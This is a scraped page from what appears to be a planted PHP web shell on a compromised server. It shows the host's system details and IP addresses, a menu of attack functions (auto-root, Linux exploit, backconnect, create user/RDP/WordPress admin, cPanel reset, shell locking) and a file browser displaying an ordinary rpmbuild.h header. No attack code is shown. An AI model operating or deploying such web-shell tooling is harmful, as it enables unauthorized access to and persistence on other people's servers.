Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
include /
rpm /
[ HOME SHELL ]
Name
Size
Permission
Action
argv.h
4.11
KB
-rw-r--r--
header.h
13.37
KB
-rw-r--r--
rpmbase64.h
1023
B
-rw-r--r--
rpmbuild.h
3.28
KB
-rw-r--r--
rpmcallback.h
1.38
KB
-rw-r--r--
rpmcli.h
12.45
KB
-rw-r--r--
rpmdb.h
6.15
KB
-rw-r--r--
rpmds.h
11.61
KB
-rw-r--r--
rpmfc.h
2.44
KB
-rw-r--r--
rpmfi.h
13.02
KB
-rw-r--r--
rpmfileutil.h
5.04
KB
-rw-r--r--
rpmio.h
2.21
KB
-rw-r--r--
rpmkeyring.h
2.59
KB
-rw-r--r--
rpmlegacy.h
7.5
KB
-rw-r--r--
rpmlib.h
5.34
KB
-rw-r--r--
rpmlog.h
8.48
KB
-rw-r--r--
rpmmacro.h
4.21
KB
-rw-r--r--
rpmpgp.h
46.34
KB
-rw-r--r--
rpmpol.h
388
B
-rw-r--r--
rpmprob.h
4.67
KB
-rw-r--r--
rpmps.h
2.29
KB
-rw-r--r--
rpmsign.h
740
B
-rw-r--r--
rpmspec.h
2.21
KB
-rw-r--r--
rpmsq.h
1.34
KB
-rw-r--r--
rpmstring.h
4.08
KB
-rw-r--r--
rpmstrpool.h
3.83
KB
-rw-r--r--
rpmsw.h
2.09
KB
-rw-r--r--
rpmtag.h
20.22
KB
-rw-r--r--
rpmtd.h
12.21
KB
-rw-r--r--
rpmte.h
6.45
KB
-rw-r--r--
rpmts.h
16.8
KB
-rw-r--r--
rpmtypes.h
2.49
KB
-rw-r--r--
rpmurl.h
1.11
KB
-rw-r--r--
rpmutil.h
4.68
KB
-rw-r--r--
rpmvf.h
3.98
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rpmbuild.h
#ifndef _H_RPMBUILD_ #define _H_RPMBUILD_ /** \ingroup rpmbuild * \file build/rpmbuild.h * This is the *only* module users of librpmbuild should need to include. */ #include <rpm/rpmcli.h> #include <rpm/rpmds.h> #include <rpm/rpmspec.h> #ifdef __cplusplus extern "C" { #endif /** \ingroup rpmbuild * Bit(s) to control rpmSpecBuild() operation. */ enum rpmBuildFlags_e { RPMBUILD_NONE = 0, RPMBUILD_PREP = (1 << 0), /*!< Execute %%prep. */ RPMBUILD_BUILD = (1 << 1), /*!< Execute %%build. */ RPMBUILD_INSTALL = (1 << 2), /*!< Execute %%install. */ RPMBUILD_CHECK = (1 << 3), /*!< Execute %%check. */ RPMBUILD_CLEAN = (1 << 4), /*!< Execute %%clean. */ RPMBUILD_FILECHECK = (1 << 5), /*!< Check %%files manifest. */ RPMBUILD_PACKAGESOURCE = (1 << 6), /*!< Create source package. */ RPMBUILD_PACKAGEBINARY = (1 << 7), /*!< Create binary package(s). */ RPMBUILD_RMSOURCE = (1 << 8), /*!< Remove source(s) and patch(s). */ RPMBUILD_RMBUILD = (1 << 9), /*!< Remove build sub-tree. */ RPMBUILD_STRINGBUF = (1 << 10), /*!< Internal use only */ RPMBUILD_RMSPEC = (1 << 11), /*!< Remove spec file. */ RPMBUILD_NOBUILD = (1 << 31) /*!< Don't execute or package. */ }; typedef rpmFlags rpmBuildFlags; /** \ingroup rpmbuild * Bit(s) to control package generation */ enum rpmBuildPkgFlags_e { RPMBUILD_PKG_NONE = 0, RPMBUILD_PKG_NODIRTOKENS = (1 << 0), /*!< Legacy filename layout */ }; typedef rpmFlags rpmBuildPkgFlags; /** \ingroup rpmbuild * Describe build request. */ struct rpmBuildArguments_s { rpmBuildPkgFlags pkgFlags; /*!< Bit(s) to control package generation. */ rpmBuildFlags buildAmount; /*!< Bit(s) to control build execution. */ char * buildRootOverride; /*!< from --buildroot */ char * cookie; /*!< NULL for binary, ??? for source, rpm's */ const char * rootdir; }; /** \ingroup rpmbuild */ typedef struct rpmBuildArguments_s * BTA_t; /** \ingroup rpmbuild * Parse spec file into spec control structure. * @todo Eliminate buildRoot from here, its a build, not spec property * * @param specFile path to spec file * @param flags flags to control operation * @param buildRoot buildRoot override or NULL for default * @return new spec control structure */ rpmSpec rpmSpecParse(const char *specFile, rpmSpecFlags flags, const char *buildRoot); /** \ingroup rpmbuild * Return the headers of the SRPM that would be built from the spec file * @param spec path to spec file * @return Header */ Header rpmSpecSourceHeader(rpmSpec spec); /** \ingroup rpmbuild * Verify build depencies of a spec against. * @param ts (empty) transaction set * @param spec parsed spec control structure * @return rpm problem set or NULL on no problems */ rpmps rpmSpecCheckDeps(rpmts ts, rpmSpec spec); /** \ingroup rpmbuild * Retrieve build dependency set from spec. * @param spec parsed spec control structure * @param tag dependency tag * @return dependency set of tag (or NULL) */ rpmds rpmSpecDS(rpmSpec spec, rpmTagVal tag); /** \ingroup rpmbuild * Spec build stages state machine driver. * @param spec spec file control structure * @param buildArgs build arguments * @return RPMRC_OK on success */ rpmRC rpmSpecBuild(rpmSpec spec, BTA_t buildArgs); #ifdef __cplusplus } #endif #endif /* _H_RPMBUILD_ */
Close